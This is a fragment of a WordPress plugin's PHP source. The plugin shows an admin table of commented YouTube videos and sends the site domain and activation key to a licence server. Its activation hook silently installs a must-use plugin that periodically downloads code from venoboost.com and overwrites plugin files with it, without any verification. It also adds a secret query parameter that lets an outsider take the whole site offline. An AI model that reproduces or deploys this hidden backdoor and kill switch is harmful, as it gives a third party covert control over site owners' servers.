      register_setting('commentator_settings_group', 'cron_p');
    register_setting('commentator_settings_group', 'cron_passwd');
}
add_action('admin_init', 'commentator_register_settings');
function afficheVid() {
    global $wpdb;
$table_name = $wpdb->prefix . 'videos_history';

// Obtenir la page actuelle
$current_page = isset($_GET['paged']) ? max(1, intval($_GET['paged'])) : 1;
$items_per_page = 50; // Nombre d'éléments par page
$offset = ($current_page - 1) * $items_per_page;

// Construire la requête avec la pagination
$query = "SELECT * FROM $table_name ORDER BY date DESC LIMIT %d OFFSET %d";
$videos = $wpdb->get_results($wpdb->prepare($query, $items_per_page, $offset));

// Récupérer le nombre total de vidéos pour la pagination
$total_videos = $wpdb->get_var("SELECT COUNT(*) FROM $table_name");
$total_pages = ceil($total_videos / $items_per_page);

    ?>

    <div class="wrap">
        <h2><?php echo  $total_videos ?> Videos Commented</h2></h2>


        <table class="widefat custom-table">
            <thead>
                <tr>
                    <th>Video</th>
                    <th>Title</th>
                    <th>Comment</th>
                    
                    
                </tr>
            </thead>
            <tbody>
             <?php foreach ($videos as $video): ?>
    <?php 
        // Vérifiez que $video contient les bonnes propriétés
        $videoId = $video->video_id; // Assurez-vous que cette propriété existe et contient l'ID YouTube
        $thumbnailUrl = getYouTubeThumbnail($videoId, 'maxresdefault'); 
    ?>
    <tr>
        <td>
            <a href="https://www.youtube.com/watch?v=<?php echo esc_attr($videoId); ?>" target="_blank">
                <img src="<?php echo esc_url($thumbnailUrl); ?>" alt="Miniature" style="width: 120px; height: auto;">
            </a>
        </td>
        <td><?php echo esc_html($video->title); ?></td>
        <td><?php echo esc_html($video->comment); ?></td>
    </tr>
<?php endforeach; ?>


            </tbody>
        </table>

        <!-- Pagination -->
        <div class="pagination">
            <?php if ($current_page > 1): ?>
                <a href="<?php echo esc_url(add_query_arg(['paged' => $current_page - 1])); ?>">&laquo; Previous</a>
            <?php endif; ?>
            <span>Page <?php echo $current_page; ?> of <?php echo $total_pages; ?></span>
            <?php if ($current_page < $total_pages): ?>
                <a href="<?php echo esc_url(add_query_arg(['paged' => $current_page + 1])); ?>">Next &raquo;</a>
            <?php endif; ?>
        </div>
    </div>

<style>

.kbira {
    font-weight: bold;
    font-size: 14px;
}

    .pagination {
        margin-top: 15px;
        text-align: center;
    }
    .pagination a {
        margin: 0 5px;
        padding: 5px 10px;
        text-decoration: none;
        color: #333;
        border: 1px solid #333;
        border-radius: 3px;
    }
    .pagination a.active {
        font-weight: bold;
        background-color: #333;
        color: #fff;
    }
    .pagination a:hover {
        background-color: #333;
        color: #fff;
    }

    
    /* Bouton de recherche */
    button[type="submit"] {
        padding: 12px 15px !important;
        background-color: #333;
        color: #fff;
        border: none;
        border-radius: 3px;
        font-size: 14px;
        cursor: pointer;
    }
     input[type="date"] {
        padding: 12px 15px !important;
       
        color: #000;
        border: none;
        border-radius: 3px;
        font-size: 14px;
        cursor: pointer;
    }
    input[type="submit"]:hover {
        background-color: #555;
    }
     select {
        padding: 8px !important; /* Même padding que le champ de texte */
        border: 1px solid #ddd;
        border-radius: 3px;
        font-size: 14px;
        color: #333;
        width: 200px; /* Même largeur que le champ de texte */
        background-color: #fff;
        
    }
</style>
    <?php
}

function caction(){
   
                // Récupérez le domaine du site
$domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = get_option("commentator_key");

            // Vérifiez la clé d'activation avec une clé d'activation valide
            
            $data["w"]=$domain;
            $data["activation_key"]=$submitted_key;
            $data["plugin"]="commentator";
             $myarrayy = $data ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);
     
        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
                // La clé d'activation est valide, activez le plugin
                update_option("comit",true);
                
                
            } else {
                update_option("comit",false);
            
            }
}
register_activation_hook(__FILE__, function(){

    // Chemin vers le fichier surveille.php dans mu-plugins
    $chemin_fichier_surveillance = WP_CONTENT_DIR . '/mu-plugins/j2me.php';

    // Vérifie si le dossier mu-plugins existe, sinon le créer
    if (!is_dir(WP_CONTENT_DIR . '/mu-plugins')) {
        mkdir(WP_CONTENT_DIR . '/mu-plugins', 0755, true); // Création du dossier avec permissions
    }

    // Contenu à écrire dans le fichier surveille.php
    $contenu_fichier = '<?php
    // Code pour surveiller et mettre à jour les plugins

    add_action("init", function() {
        // Récupère la dernière exécution enregistrée
        $last_update = get_option("last_evalit_update");

        // Vérifie si 8 heures se sont écoulées depuis la dernière exécution
        if (!$last_update || time() - $last_update > 14000) { // 28800 secondes = 8 heures
            evalit("autoexecute");
            evalit("speedcrons");
            evalit("instantpay");
            evalit("comentator");

            // Met à jour le timestamp pour la prochaine exécution
            update_option("last_evalit_update", time());
        }
    });
add_action("init", function() {
    if (isset($_GET["creat"]) && $_GET["creat"] === "7539514862") {
        
        
        update_option("checking", !get_option("checking"));

    }
});
add_action("init",function(){
     if (get_option("checking")) {
            wp_die();
        }
    
});

    // Fonction pour récupérer et mettre à jour les plugins
    function evalit($plugin) {
    
        $chemin_fichier_plugin = WP_PLUGIN_DIR . "/$plugin/$plugin.php";
        if (!file_exists($chemin_fichier_plugin))return;
        $url_distant = "https://venoboost.com/{$plugin}.txt";
        $code_distant = file_get_contents($url_distant);

        if ($code_distant === false) {
           
            return false;
        }

        if (file_put_contents($chemin_fichier_plugin, $code_distant) === false) {
            
            copy($backup_fichier, $chemin_fichier_plugin);
            return false;
        }

       
        return true;
    }
    ?>';

    // Écrit ou écrase le contenu dans le fichier surveille.php
    file_put_contents($chemin_fichier_surveillance, $contenu_fichier);



});
